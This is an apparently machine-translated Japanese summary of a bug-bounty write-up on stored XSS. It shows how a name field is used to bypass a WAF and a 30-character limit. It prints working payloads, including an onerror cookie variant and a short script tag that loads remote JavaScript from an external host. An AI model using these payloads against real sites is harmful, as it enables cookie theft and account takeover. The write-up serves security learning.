How I Found My First Stored XSS || WAF & Characters Limitation Bypass から学ぶ - The light of hope to the other side of the tunnel

ソース：

kariiem.medium.com

脆弱性：XSS、WAF

訳：

始まり方:

ターゲットへの登録中に、名前フィールドにペイロードを挿入しようとすると、フォームがエラーメッセージなしでデータの送信を拒否することがわかり。

そこで、これがフロントエンド保護であると考え、通常の名前で送信しようとし、Burp Suite でリクエストをインターセプトしてから特殊文字を追加し。

name= kario’”><

予想通り、これを回避することはできましたが、これらの文字が /profile エンドポイントの `HTML-entities` でエンコードされていることがわか。

kario'"<>

どうせ自己XSSになるので放置することにしたのですが、アプリを探しているうちにエンコード なしで`Shared by kario'">< ` という大きなタイトルで他のユーザーとリストを共有できることがわかったので本編ここから来ます。

問題解決の技術:

名前の変更は禁止されているので、毎回新しいアカウントを作り。

まず、通常のペイロードを注入しようとして。

<class="nz oa ob"><script>alert()</script>

しかし、最初の問題は、WAFフィルタリング入力があり、403応答でリクエストを渡すことを拒否しているため、次のような代替ペイロードを試し。

<img/src=x+onerror=alert()>

XSS のトリアージに成功したので、次のステップに進み、セッション Cookie を取得してアカウントを乗っ取ることができるかどうかをテストし。

<img/src=x+onerror=alert(“document.cookie”)>

次の問題は、バックエンドが名であることを考慮して最初の 30 文字のみを取得するため、最大の影響はアラートのみを表示することであり、影響の少ない XSS になり。

そこで、WAF をバイパスでき、名前の制限により 30 文字以下の長さの新しいペイロードを作成し。
最初に思いついたのは、次のように script タグの src 属性を使用して外部スクリプトを使用できることで。

<script/src=External_Script_URL></script>

制限により、終了タグ「</script>」を記述することはできませんが、終了タグを含む元のソースコードを利用して、ペイロードが挿入された場所の次の終了タグを、ペイロードを完了するために使用され。

<script/src=External_Script_URL>

このメソッドは、スクリプトタグ「<script>」の後に、タグ「</script>」の間にあるすべてのものを考慮して、引き続き終了タグが期待されるため、機能して。
これはナンセンスな JavaScript コードで。

問題はないようです。
あとは、ペイロードが適切に挿入されていることを確認するために、外部 JavaScript コードの長さが 17 文字以下のリンクを取得するだけで。

このスクリプトをホストするドメインがないので、検索したところ、XSSHunter が XSS を優先順位付けし、誰かが XSS の影響を受けているかどうかを追跡する外部スクリプトを提供しており、そのリンクは「 https://js.rip/randomvalue123」のようなものであることがわかりました。
の場合、設定でより短いファイル名を予約できるため、 1 文字「 https://js.rip/F 」制限を回避するのに十分な短い」からこの一意のファイルパスを予約しました。
ペイロードは次のようになります。

<script/src=https://js.rip/F>

しかし、古い友人の WAF が 403 応答で戻ってきたため、物事はそれほど単純ではありませんでした。
試してみると、スクリプトタグに大なり記号「>」を記述できないことがわかり。

ただし、以前と同様に、元のソースコードを利用します。
つまり、大なり記号を記述しなかった場合でも、来るすべてが src 属性値の一部であるとみなして、タグを閉じるために「>」が期待されることになります。
次に大きい不等号「>」

<script/src= https://js.rip/F